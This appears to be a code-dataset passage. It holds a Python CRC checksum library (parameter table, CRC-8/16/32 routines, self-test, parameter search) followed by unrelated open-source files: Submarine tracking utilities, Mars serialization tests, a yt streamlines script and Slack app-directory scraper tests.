'CRC-16/ARC': {'width': 16, 'poly': 0x8005, 'init': 0x0000, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0xBB3D},
'CRC-16/AUG-CCITT': {'width': 16, 'poly': 0x1021, 'init': 0x1D0F, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0xE5CC},
'CRC-16/BUYPASS': {'width': 16, 'poly': 0x8005, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0xFEE8},
'CRC-16/CDMA2000': {'width': 16, 'poly': 0xC867, 'init': 0xFFFF, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x4C06},
'CRC-16/DDS-110': {'width': 16, 'poly': 0x8005, 'init': 0x800D, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x9ECF},
'CRC-16/DECT-R': {'width': 16, 'poly': 0x0589, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0001, 'check': 0x007E},
'CRC-16/DECT-X': {'width': 16, 'poly': 0x0589, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x007F},
'CRC-16/DNP': {'width': 16, 'poly': 0x3D65, 'init': 0x0000, 'refin': True, 'refout': True, 'xorout': 0xFFFF, 'check': 0xEA82},
'CRC-16/EN-13757': {'width': 16, 'poly': 0x3D65, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0xFFFF, 'check': 0xC2B7},
'CRC-16/GENIBUS': {'width': 16, 'poly': 0x1021, 'init': 0xFFFF, 'refin': False, 'refout': False, 'xorout': 0xFFFF, 'check': 0xD64E},
'CRC-16/MAXIM': {'width': 16, 'poly': 0x8005, 'init': 0x0000, 'refin': True, 'refout': True, 'xorout': 0xFFFF, 'check': 0x44C2},
'CRC-16/MCRF4XX': {'width': 16, 'poly': 0x1021, 'init': 0xFFFF, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0x6F91},
'CRC-16/T10-DIF': {'width': 16, 'poly': 0x8BB7, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0xD0DB},
'CRC-16/TELEDISK': {'width': 16, 'poly': 0xA097, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x0FB3},
'CRC-16/TMS37157': {'width': 16, 'poly': 0x1021, 'init': 0x89EC, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0x26B1},
'CRC-16/USB': {'width': 16, 'poly': 0x8005, 'init': 0xFFFF, 'refin': True, 'refout': True, 'xorout': 0xFFFF, 'check': 0xB4C8},
'CRC-A': {'width': 16, 'poly': 0x1021, 'init': 0xC6C6, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0xBF05},
'CRC-16/KERMIT': {'width': 16, 'poly': 0x1021, 'init': 0x0000, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0x2189},
'CRC-16/MODBUS': {'width': 16, 'poly': 0x8005, 'init': 0xFFFF, 'refin': True, 'refout': True, 'xorout': 0x0000, 'check': 0x4B37},
'CRC-16/X-25': {'width': 16, 'poly': 0x1021, 'init': 0xFFFF, 'refin': True, 'refout': True, 'xorout': 0xFFFF, 'check': 0x906E},
'CRC-16/XMODEM': {'width': 16, 'poly': 0x1021, 'init': 0x0000, 'refin': False, 'refout': False, 'xorout': 0x0000, 'check': 0x31C3},
# 32 bit
'CRC-32': {'width': 32, 'poly': 0x04C11DB7, 'init': 0xFFFFFFFF, 'refin': True, 'refout': True, 'xorout': 0xFFFFFFFF, 'check': 0xCBF43926},
'CRC-32/UBI': {'width': 32, 'poly': 0x04C11DB7, 'init': 0xFFFFFFFF, 'refin': True, 'refout': True, 'xorout': 0x00000000, 'check': 0x340BC6D9},
'CRC-32/BZIP2': {'width': 32, 'poly': 0x04C11DB7, 'init': 0xFFFFFFFF, 'refin': False, 'refout': False, 'xorout': 0xFFFFFFFF, 'check': 0xFC891918},
'CRC-32/32D': {'width': 32, 'poly': 0xA833982B, 'init': 0xFFFFFFFF, 'refin': True, 'refout': True, 'xorout': 0xFFFFFFFF, 'check': 0x87315576},
'CRC-32/MPEG-2': {'width': 32, 'poly': 0x04C11DB7, 'init': 0xFFFFFFFF, 'refin': False, 'refout': False, 'xorout': 0x00000000, 'check': 0x0376E6E7},
'CRC-32/POSIX': {'width': 32, 'poly': 0x04C11DB7, 'init': 0x00000000, 'refin': False, 'refout': False, 'xorout': 0xFFFFFFFF, 'check': 0x765E7680},
'CRC-32/32Q': {'width': 32, 'poly': 0x814141AB, 'init': 0x00000000, 'refin': False, 'refout': False, 'xorout': 0x00000000, 'check': 0x3010BF7F},
'CRC-32/JAMCRC': {'width': 32, 'poly': 0x04C11DB7, 'init': 0xFFFFFFFF, 'refin': True, 'refout': True, 'xorout': 0x00000000, 'check': 0x340BC6D9},
'CRC-32/XFER': {'width': 32, 'poly': 0x000000AF, 'init': 0x00000000, 'refin': False, 'refout': False, 'xorout': 0x00000000, 'check': 0xBD0BE338},
}
def __init__(self):
"""CRC constructor"""
# set default configuration for operating mode
self.config = self.set_config_by_name('CRC-8')
def set_config(self, config):
"""Set CRC configuration"""
try:
# set CRC parameters
self.width = config['width'] # width in bits, e.g. 8, 16, 32
self.poly = config['poly'] # generator polynom
self.check = config['check'] # check value for check input string ("123456789")
self.init = config['init'] # initial value
self.refin = config['refin'] # flag for reflection of input data
self.refout = config['refout'] # flag for reflection of checksum output
self.xorout = config['xorout'] # value for final xor (0x00 if not used)
# set CRC compute method and rebuild look-up table
if self.width == 8:
self.crc_method = self.fast_crc8
self.crc8_table = self.calc_crc8_lut(self.poly)
elif self.width == 16:
self.crc_method = self.fast_crc16
self.crc16_table = self.calc_crc16_lut(self.poly)
elif self.width == 32:
self.crc_method = self.fast_crc32
self.crc32_table = self.calc_crc32_lut(self.poly)
except KeyError:
msg = "Invalid CRC configuration '{}'".format(conf)
raise Exception(msg)
return True
def set_config_by_name(self, crc_name):
"""Set CRC configuration by name"""
try:
# get parameters of specified configuration
config = self.CRC_CONFIG[crc_name.upper()]
# set CRC parameters
self.width = config['width'] # width in bits, e.g. 8, 16, 32
self.poly = config['poly'] # generator polynom
self.check = config['check'] # check value for check input string ("123456789")
self.init = config['init'] # initial value
self.refin = config['refin'] # flag for reflection of input data
self.refout = config['refout'] # flag for reflection of checksum output
self.xorout = config['xorout'] # value for final xor (0x00 if not used)
# set CRC compute method and rebuild look-up table
if self.width == 8:
self.crc_method = self.fast_crc8
self.crc8_table = self.calc_crc8_lut(self.poly)
elif self.width == 16:
self.crc_method = self.fast_crc16
self.crc16_table = self.calc_crc16_lut(self.poly)
elif self.width == 32:
self.crc_method = self.crc32
self.crc32_table = self.calc_crc32_lut(self.poly)
except KeyError:
msg = "Could not set CRC configuration '{}'".format(crc_name)
raise Exception(msg)
return True
def compute(self, data):
"""Compute CRC with the current active configuration"""
result = self.crc_method(data)
return result
def self_test(self):
"""Perform a self-test with all CRC configurations"""
success = True
print("[*] Starting CRC self-test ({} configurations)".format(len(CRC.CRC_CONFIG)))
for conf in CRC.CRC_CONFIG.keys():
self.set_config_by_name(conf)
crc = self.compute(CRC.CHECK_DATA)
passed = (crc == self.check)
print("{}: result = 0x{:0X}, check = 0x{:0X}, passed = {}".format(conf, crc, self.check, passed))
if not passed:
success = False
if success:
print("[*] CRC self-test completed successfully")
else:
print("[*] CRC self-test completed not successfully")
return success
def crc8(self, data):
"""Calculate CRC-8
Bitwise implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
if self.refin:
crc ^= REVERSE_BITS_LUT[b]
else:
crc ^= b
# process bits of data byte
for i in range(8):
if (crc & 0x80) != 0:
crc = (crc << 1) ^ self.poly
else:
crc <<= 1
if self.refout:
crc = REVERSE_BITS_LUT[crc & 0xff]
# return CRC-8
return (crc ^ self.xorout) & 0xff
def calc_crc8_lut(self, generator):
"""Calculate look-up table for CRC-8"""
# CRC-8 look-up table
self.crc8_table = [None] * 256
# calculate all possible 256 byte values
for divident in range(256):
b = divident
# process bits of data byte
for bit in range(8):
if (b & 0x80) != 0:
b <<= 1
b ^= generator
else:
b <<= 1
# store CRC value in look-up table
self.crc8_table[divident] = b
# return generated CRC-8 look-up table
return self.crc8_table
def fast_crc8(self, data):
"""Calculate CRC-8
Look-up table implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
if self.refin:
b = REVERSE_BITS_LUT[b]
# xor next input byte with CRC
d = (b ^ crc) & 0xff
# get CRC value from look-up table
crc = self.crc8_table[d]
# CRC reflection
if self.refout:
crc = REVERSE_BITS_LUT[crc & 0xff]
# return CRC-8
return (crc ^ self.xorout) & 0xff
def crc16(self, data):
"""Calculate CRC-16
Bitwise implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
# xor data byte with most significant byte of 16 bit CRC
if self.refin:
crc ^= REVERSE_BITS_LUT[b] << 8
else:
crc ^= (b << 8)
# process bits of data byte
for i in range(8):
# check if most significant bit is set
if (crc & 0x8000) != 0:
crc = (crc << 1) ^ self.poly
else:
crc <<= 1
# CRC reflection
if self.refout:
crc = reverse_bits_word(crc & 0xffff)
# return CRC-16
return (crc ^ self.xorout) & 0xffff
def calc_crc16_lut(self, generator):
"""Calculate look-up table for CRC-16"""
# CRC-16 look-up table
self.crc16_table = [None] * 256
# calculate all possible 256 byte values
for divident in range(256):
# move divident byte into most significant byte of 16 bit CRC
b = (divident << 8)
# process bits of data byte
for bit in range(8):
if (b & 0x8000) != 0:
b <<= 1
b ^= generator
else:
b <<= 1
# store CRC value in look-up table
self.crc16_table[divident] = b
# return generated CRC-16 look-up table
return self.crc16_table
def fast_crc16(self, data):
"""Calculate CRC-16
Look-up table implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
if self.refin:
b = REVERSE_BITS_LUT[b]
# xor next input byte with most significant byte of CRC
d = (b ^ (crc >> 8)) & 0xff
# get CRC value from look-up table
crc = (crc << 8) ^ self.crc16_table[d]
# CRC reflection
if self.refout:
crc = reverse_bits_word(crc & 0xffff)
# return CRC-16
return (crc ^ self.xorout) & 0xffff
def crc32(self, data):
"""Calculate CRC-32
Bitwise implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
# xor data byte with most significant byte of 32 bit CRC
if self.refin:
crc ^= REVERSE_BITS_LUT[b] << 24
else:
crc ^= (b << 24)
# process bits of data byte
for i in range(8):
# check if most significant bit is set
if (crc & 0x80000000) != 0:
crc = (crc << 1) ^ self.poly
else:
crc <<= 1
# CRC reflection
if self.refout:
crc = reverse_bits_dword(crc & 0xffffffff)
# return CRC-32
return (crc ^ self.xorout) & 0xffffffff
def calc_crc32_lut(self, generator):
"""Calculate look-up table for CRC-32"""
# CRC-32 look-up table
self.crc32_table = [None] * 256
# calculate all possible 256 byte values
for divident in range(256):
# move divident byte into most significant byte of 32 bit CRC
b = (divident << 24)
# process bits of data byte
for bit in range(8):
if (b & 0x80000000) != 0:
b <<= 1
b ^= generator
else:
b <<= 1
# store CRC value in look-up table
self.crc32_table[divident] = b
# return generated CRC-32 look-up table
return self.crc32_table
def fast_crc32(self, data):
"""Calculate CRC-32
Look-up table implementation
"""
# initialize CRC
crc = self.init
# process all data bytes
for b in data:
if self.refin:
                b = REVERSE_BITS_LUT[b]
# xor next input byte with most significant byte of CRC
d = (((b << 24) ^ crc) >> 24) & 0xff
# get CRC value from look-up table
crc = (crc << 8) ^ self.crc32_table[d]
# CRC reflection
if self.refout:
crc = reverse_bits_dword(crc & 0xffffffff)
# return CRC-32
return (crc ^ self.xorout) & 0xffffffff
def find_config(self, width, target, only_known=False, max_poly=0xff, max_init=0xff, max_xor=0xff):
"""Try to find a suitable CRC config for a given CRC and data
in the most simple and not efficient way
"""
# first, test all known CRC configurations with the given width
for conf in CRC.CRC_CONFIG.keys():
self.set_config_by_name(conf)
# test CRC for all given targets and count matches
match_count = 0
for t in target:
c = self.compute(t[0])
if c == t[1]:
match_count += 1
else:
break
if match_count == len(target):
return (conf, CRC.CRC_CONFIG[conf])
# if only known CRC configurations should be searched, return here
# without result
if only_known:
return None
# create initial config
config = {'width': width, 'poly': 0, 'init': 0, 'refin': False, 'refout': False, 'xorout': 0x00, 'check': 0x00}
self.width = width
self.refin = False
self.refout = False
self.xorout = 0x00
# set CRC compute method and rebuild look-up table
if self.width == 8:
self.crc_method = self.fast_crc8
self.crc8_table = self.calc_crc8_lut(self.poly)
update_table = self.calc_crc8_lut
elif self.width == 16:
self.crc_method = self.fast_crc16
self.crc16_table = self.calc_crc16_lut(self.poly)
update_table = self.calc_crc16_lut
elif self.width == 32:
self.crc_method = self.crc32
self.crc32_table = self.calc_crc32_lut(self.poly)
update_table = self.calc_crc32_lut
# test all possible xor values
for xorout in range(max_xor):
self.xorout = xorout
# test all possibly generator polynoms
for poly in range(1, max_poly):
self.poly = poly
# update CRC table for new generator polynom
update_table(self.poly)
# test all possible init values
for init in range(max_init):
self.init = init
# check configuration for all targets with all possible
# configurations
# refin=False, refout=False
self.refin = False
self.refout = False
# test CRC for all given targets and count matches
match_count = 0
for t in target:
c = self.compute(t[0])
if c == t[1]:
match_count += 1
else:
break
if match_count == len(target):
# set found config parameters in config
config['poly'] = self.poly
config['init'] = self.init
config['xorout'] = self.xorout
config['refin'] = self.refin
config['refout'] = self.refout
config['check'] = self.compute(CRC.CHECK_DATA)
return ('unknown', config)
# refin=True, refout=False
self.refin = True
                    self.refout = False
# test CRC for all given targets and count matches
match_count = 0
for t in target:
c = self.compute(t[0])
if c == t[1]:
match_count += 1
else:
break
if match_count == len(target):
# set found config parameters in config
config['poly'] = self.poly
config['init'] = self.init
config['xorout'] = self.xorout
config['refin'] = self.refin
config['refout'] = self.refout
config['check'] = self.compute(CRC.CHECK_DATA)
return ('unknown', config)
# refin=False, refout=True
self.refin = False
self.refout = True
# test CRC for all given targets and count matches
match_count = 0
for t in target:
c = self.compute(t[0])
if c == t[1]:
match_count += 1
else:
break
if match_count == len(target):
# set found config parameters in config
config['poly'] = self.poly
config['init'] = self.init
config['xorout'] = self.xorout
config['refin'] = self.refin
config['refout'] = self.refout
config['check'] = self.compute(CRC.CHECK_DATA)
return ('unknown', config)
# refin=True, refout=True
self.refin = True
self.refout = True
# test CRC for all given targets and count matches
match_count = 0
for t in target:
c = self.compute(t[0])
if c == t[1]:
match_count += 1
else:
break
if match_count == len(target):
# set found config parameters in config
config['poly'] = self.poly
config['init'] = self.init
config['xorout'] = self.xorout
config['refin'] = self.refin
config['refout'] = self.refout
config['check'] = self.compute(CRC.CHECK_DATA)
return ('unknown', config)
return None
# main
if __name__ == "__main__":
# CRC self-test
crc = CRC()
data = b"123456789"
crc.self_test()
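    # Additional usage sketch: compute a checksum with a named built-in
    # configuration, then try to recover a matching known configuration from
    # a single (data, checksum) sample via find_config().
    crc.set_config_by_name('CRC-16/MODBUS')
    checksum = crc.compute(data)
    print("CRC-16/MODBUS of {!r}: 0x{:04X}".format(data, checksum))
    match = crc.find_config(16, [(data, checksum)], only_known=True)
    if match is not None:
        name, _ = match
        print("Recovered known configuration: {}".format(name))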
| 40.885023 | 159 | 0.530768 |
4a223c1968ac215bcd594b0e934ebb68c4ca89e0 | 1,078 | py | Python | ravens/ravens/models/__init__.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 23,901 | 2018-10-04T19:48:53.000Z | 2022-03-31T21:27:42.000Z | ravens/ravens/models/__init__.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 891 | 2018-11-10T06:16:13.000Z | 2022-03-31T10:42:34.000Z | ravens/ravens/models/__init__.py | deepneuralmachine/google-research | d2ce2cf0f5c004f8d78bfeddf6e88e88f4840231 | [
"Apache-2.0"
] | 6,047 | 2018-10-12T06:31:02.000Z | 2022-03-31T13:59:28.000Z | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Ravens models package."""
from ravens.models.attention import Attention
from ravens.models.conv_mlp import ConvMLP
from ravens.models.conv_mlp import DeepConvMLP
from ravens.models.gt_state import MlpModel
from ravens.models.matching import Matching
from ravens.models.regression import Regression
from ravens.models.transport import Transport
from ravens.models.transport_ablation import TransportPerPixelLoss
from ravens.models.transport_goal import TransportGoal
| 39.925926 | 74 | 0.805195 |
4a223e129e82d540a0761ed5df9907573ab06e48 | 3,368 | py | Python | submarine-sdk/pysubmarine/submarine/tracking/utils.py | RamakrishnaChilaka/submarine | e8104e5935a0b15d7ccbb000650f2bfe90525ba0 | [
"Apache-2.0"
] | 2 | 2020-02-07T07:12:56.000Z | 2021-08-29T10:47:20.000Z | submarine-sdk/pysubmarine/submarine/tracking/utils.py | RamakrishnaChilaka/submarine | e8104e5935a0b15d7ccbb000650f2bfe90525ba0 | [
"Apache-2.0"
] | null | null | null | submarine-sdk/pysubmarine/submarine/tracking/utils.py | RamakrishnaChilaka/submarine | e8104e5935a0b15d7ccbb000650f2bfe90525ba0 | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import json
import os
import uuid
from submarine.utils import env
_TRACKING_URI_ENV_VAR = "SUBMARINE_TRACKING_URI"
# https://github.com/linkedin/TonY/pull/431
_JOB_ID_ENV_VAR = "JOB_ID"
_TF_CONFIG = "TF_CONFIG"
_CLUSTER_SPEC = "CLUSTER_SPEC"
_JOB_NAME = "JOB_NAME"
_TYPE = "type"
_TASK = "task"
_INDEX = "index"
_RANK = "RANK"
# Extra environment variables which take precedence for setting the basic/bearer
# auth on http requests.
_TRACKING_USERNAME_ENV_VAR = "SUBMARINE_TRACKING_USERNAME"
_TRACKING_PASSWORD_ENV_VAR = "SUBMARINE_TRACKING_PASSWORD"
_TRACKING_TOKEN_ENV_VAR = "SUBMARINE_TRACKING_TOKEN"
_TRACKING_INSECURE_TLS_ENV_VAR = "SUBMARINE_TRACKING_INSECURE_TLS"
def get_job_id():
"""
Get the current experiment id.
    :return: The experiment id.
"""
# Get yarn application or K8s experiment ID when running distributed training
if env.get_env(_JOB_ID_ENV_VAR) is not None:
return env.get_env(_JOB_ID_ENV_VAR)
else: # set Random ID when running local training
job_id = uuid.uuid4().hex
os.environ[_JOB_ID_ENV_VAR] = job_id
return job_id
def get_worker_index():
"""
Get the current worker index.
    :return: The worker index.
"""
# Get TensorFlow worker index
if env.get_env(_TF_CONFIG) is not None:
tf_config = json.loads(os.environ.get(_TF_CONFIG))
task_config = tf_config.get(_TASK)
task_type = task_config.get(_TYPE)
task_index = task_config.get(_INDEX)
worker_index = task_type + "-" + str(task_index)
elif env.get_env(_CLUSTER_SPEC) is not None:
cluster_spec = json.loads(os.environ.get(_CLUSTER_SPEC))
task_config = cluster_spec.get(_TASK)
task_type = task_config.get(_JOB_NAME)
task_index = task_config.get(_INDEX)
worker_index = task_type + "-" + str(task_index)
# Get PyTorch worker index
elif env.get_env(_RANK) is not None:
rank = env.get_env(_RANK)
if rank == "0":
worker_index = "master-0"
else:
worker_index = "worker-" + rank
# Set worker index to "worker-0" When running local training
else:
worker_index = "worker-0"
return worker_index
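# Example (hedged sketch): with TF_CONFIG set to
#   {"cluster": {...}, "task": {"type": "worker", "index": 1}}
# get_worker_index() returns "worker-1"; with RANK="0" (PyTorch) it returns
# "master-0"; without any distributed environment it falls back to "worker-0".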
def get_tracking_sqlalchemy_store(store_uri: str):
from submarine.store.tracking.sqlalchemy_store import SqlAlchemyStore
return SqlAlchemyStore(store_uri)
def get_model_registry_sqlalchemy_store(store_uri: str):
from submarine.store.model_registry.sqlalchemy_store import SqlAlchemyStore
return SqlAlchemyStore(store_uri)
| 33.68 | 81 | 0.731295 |
4a223eaef059d9d8e3ce203f05e60215ef44885b | 5,130 | py | Python | mars/serialization/tests/test_serial.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | 1 | 2021-09-03T18:52:06.000Z | 2021-09-03T18:52:06.000Z | mars/serialization/tests/test_serial.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | null | null | null | mars/serialization/tests/test_serial.py | hxri/mars | f7864f00911883b94800b63856f0e57648d3d9b4 | [
"Apache-2.0"
] | null | null | null | # Copyright 1999-2021 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from collections import OrderedDict
import numpy as np
import pandas as pd
import pytest
try:
import pyarrow as pa
except ImportError:
pa = None
try:
import scipy.sparse as sps
except ImportError:
sps = None
from mars.lib.sparse import SparseMatrix
from mars.serialization import serialize, deserialize
from mars.tests.core import require_cupy, require_cudf
from mars.utils import lazy_import
cupy = lazy_import('cupy', globals=globals())
cudf = lazy_import('cudf', globals=globals())
class CustomList(list):
pass
@pytest.mark.parametrize(
'val', [
False, 123, 3.567, 3.5 + 4.3j, b'abcd', 'abcd',
['uvw', ('mno', 'sdaf'), 4, 6.7],
CustomList([3, 4, CustomList([5, 6])]),
{'abc': 5.6, 'def': [3.4]},
OrderedDict([('abcd', 5.6)])
]
)
def test_core(val):
deserialized = deserialize(*serialize(val))
assert type(val) == type(deserialized)
assert val == deserialized
def test_nested_list():
val = ['a' * 100] * 100
val[0] = val
deserialized = deserialize(*serialize(val))
assert deserialized[0] is deserialized
assert val[1:] == deserialized[1:]
class KeyedDict(dict):
def _skeys(self):
return set(k for k in self.keys() if isinstance(k, str))
def __hash__(self):
return hash(frozenset(self._skeys()))
def __eq__(self, other: 'KeyedDict'):
return self._skeys() == other._skeys()
def test_nested_dict():
val = {i: 'b' * 100 for i in range(10)}
val[0] = val
deserialized = deserialize(*serialize(val))
assert deserialized[0] is deserialized
val = KeyedDict(abcd='efgh')
val[val] = val
deserialized = deserialize(*serialize(val))
assert deserialized[val] is deserialized
class DictWithoutInitArgs(dict):
# dict inheritance without args in __init__
def __init__(self):
super().__init__()
def test_dict_without_init_args():
val = DictWithoutInitArgs()
val['a'] = 'b'
deserialized = deserialize(*serialize(val))
assert deserialized == val
@pytest.mark.parametrize(
'val', [
np.array(np.random.rand(100, 100)),
np.array(np.random.rand(100, 100).T),
np.array(['a', 'bcd', None]),
]
)
def test_numpy(val):
deserialized = deserialize(*serialize(val))
assert type(val) == type(deserialized)
np.testing.assert_equal(val, deserialized)
if val.flags.f_contiguous:
assert deserialized.flags.f_contiguous
def test_pandas():
val = pd.Series([1, 2, 3, 4])
pd.testing.assert_series_equal(val, deserialize(*serialize(val)))
val = pd.DataFrame({
'a': np.random.rand(1000),
'b': np.random.choice(list('abcd'), size=(1000,)),
'c': np.random.randint(0, 100, size=(1000,)),
})
pd.testing.assert_frame_equal(val, deserialize(*serialize(val)))
@pytest.mark.skipif(pa is None, reason='need pyarrow to run the cases')
def test_arrow():
test_df = pd.DataFrame({
'a': np.random.rand(1000),
'b': np.random.choice(list('abcd'), size=(1000,)),
'c': np.random.randint(0, 100, size=(1000,)),
})
test_vals = [
pa.RecordBatch.from_pandas(test_df),
pa.Table.from_pandas(test_df),
]
for val in test_vals:
deserialized = deserialize(*serialize(val))
assert type(val) is type(deserialized)
np.testing.assert_equal(val, deserialized)
@pytest.mark.parametrize(
'np_val', [
np.random.rand(100, 100),
np.random.rand(100, 100).T,
]
)
@require_cupy
def test_cupy(np_val):
val = cupy.array(np_val)
deserialized = deserialize(*serialize(val))
assert type(val) is type(deserialized)
cupy.testing.assert_array_equal(val, deserialized)
@require_cudf
def test_cudf():
test_df = cudf.DataFrame(pd.DataFrame({
'a': np.random.rand(1000),
'b': np.random.choice(list('abcd'), size=(1000,)),
'c': np.random.randint(0, 100, size=(1000,)),
}))
cudf.testing.assert_frame_equal(test_df, deserialize(*serialize(test_df)))
@pytest.mark.skipif(sps is None, reason='need scipy to run the test')
def test_scipy_sparse():
val = sps.random(100, 100, 0.1, format='csr')
deserial = deserialize(*serialize(val))
assert (val != deserial).nnz == 0
@pytest.mark.skipif(sps is None, reason='need scipy to run the test')
def test_mars_sparse():
val = SparseMatrix(sps.random(100, 100, 0.1, format='csr'))
deserial = deserialize(*serialize(val))
assert (val.spmatrix != deserial.spmatrix).nnz == 0
| 28.186813 | 78 | 0.659259 |
4a2240f91e63b384458174f96a243f5159a1e5c2 | 1,153 | py | Python | doc/source/cookbook/streamlines.py | kastalpes/yt | b1e197ca84433fbd61eaf44b28ff5cdb37981d4c | [
"BSD-3-Clause-Clear"
] | 2 | 2021-03-02T18:59:49.000Z | 2021-03-02T18:59:50.000Z | doc/source/cookbook/streamlines.py | kastalpes/yt | b1e197ca84433fbd61eaf44b28ff5cdb37981d4c | [
"BSD-3-Clause-Clear"
] | 4 | 2018-04-13T23:03:42.000Z | 2018-05-08T17:50:43.000Z | doc/source/cookbook/streamlines.py | kastalpes/yt | b1e197ca84433fbd61eaf44b28ff5cdb37981d4c | [
"BSD-3-Clause-Clear"
] | 2 | 2020-05-16T15:29:37.000Z | 2020-06-22T10:17:08.000Z | import yt
import numpy as np
import matplotlib.pylab as pl
from yt.visualization.api import Streamlines
from yt.units import Mpc
from mpl_toolkits.mplot3d import Axes3D
# Load the dataset
ds = yt.load('IsolatedGalaxy/galaxy0030/galaxy0030')
# Define c: the center of the box, N: the number of streamlines,
# scale: the spatial scale of the streamlines relative to the boxsize,
# and then pos: the random positions of the streamlines.
c = ds.domain_center
N = 100
scale = ds.domain_width[0]
pos_dx = np.random.random((N,3))*scale-scale/2.
pos = c+pos_dx
# Create streamlines of the 3D vector velocity and integrate them through
# the box defined above
streamlines = Streamlines(ds, pos, 'velocity_x', 'velocity_y', 'velocity_z',
length=1.0*Mpc, get_magnitude=True)
streamlines.integrate_through_volume()
# Create a 3D plot, trace the streamlines through the 3D volume of the plot
fig=pl.figure()
ax = Axes3D(fig)
for stream in streamlines.streamlines:
stream = stream[np.all(stream != 0.0, axis=1)]
ax.plot3D(stream[:,0], stream[:,1], stream[:,2], alpha=0.1)
# Save the plot to disk.
pl.savefig('streamlines.png')
| 32.027778 | 76 | 0.734605 |
4a22426b2433024a3241522215535731b0567900 | 8,580 | py | Python | test/test_app_directory.py | eric-famiglietti/slack-apps-python | 33aebebe7b63152f8cf47e6580aa81b21c31c4bf | [
"MIT"
] | null | null | null | test/test_app_directory.py | eric-famiglietti/slack-apps-python | 33aebebe7b63152f8cf47e6580aa81b21c31c4bf | [
"MIT"
] | 1 | 2021-06-01T22:02:37.000Z | 2021-06-01T22:02:37.000Z | test/test_app_directory.py | eric-famiglietti/slack-apps-python | 33aebebe7b63152f8cf47e6580aa81b21c31c4bf | [
"MIT"
] | null | null | null | from bs4 import BeautifulSoup
import requests
import responses
import unittest
import app_directory
class GetApplicationTest(unittest.TestCase):
@responses.activate
def test_it_returns_an_application(self):
url = app_directory.BASE_URL + 'A15KDN02Y-must-read'
with open('test/resources/A15KDN02Y-must-read.html', 'r') as f:
body = f.read()
responses.add(responses.GET, url, body=body)
application = app_directory.get_application('A15KDN02Y-must-read')
self.assertEqual(application['avatar'], 'https://slack-files2.s3-us-west-2.amazonaws.com/avatars/2016-05-03/39674680625_65ad135f72eff91b6ddf_512.jpg')
self.assertEqual(len(application['categories']), 4)
self.assertTrue(len(application['description']) > 0)
self.assertEqual(application['help_url'], 'https://finalem.com/must-read/help?utm_source=slack.com&utm_medium=special&utm_campaign=apps')
self.assertEqual(application['name'], '@must-read')
self.assertEqual(application['privacy_policy_url'], 'https://finalem.com/must-read/privacy-policy?utm_source=slack.com&utm_medium=special&utm_campaign=apps')
self.assertEqual(len(application['screenshots']), 6)
self.assertEqual(application['short_description'], 'Controllable must-read lists for your team in Slack ð\x9f\x93\x95ð\x9f\x93\x97ð\x9f\x93\x98')
self.assertEqual(application['slack_id'], 'A15KDN02Y')
self.assertEqual(application['slug'], 'A15KDN02Y-must-read')
self.assertEqual(application['url'], 'https://slack.com/apps/A15KDN02Y-must-read')
class GetApplicationsTest(unittest.TestCase):
@responses.activate
def test_it_returns_a_list_of_applications(self):
url = app_directory.CATEGORY_URL + 'At0EFWTR6D-featured'
with open('test/resources/At0EFWTR6D-featured.html', 'r') as f:
body = f.read()
responses.add(responses.GET, url, body=body)
applications = app_directory.get_applications('At0EFWTR6D-featured', 1)
self.assertEqual(len(applications), 12)
self.assertEqual(applications[0]['avatar'], 'https://slack-files2.s3-us-west-2.amazonaws.com/avatars/2016-05-03/39674680625_65ad135f72eff91b6ddf_96.jpg')
self.assertFalse(applications[0]['is_slack_owned'])
self.assertEqual(applications[0]['name'], '@must-read')
self.assertEqual(applications[0]['position'], 1)
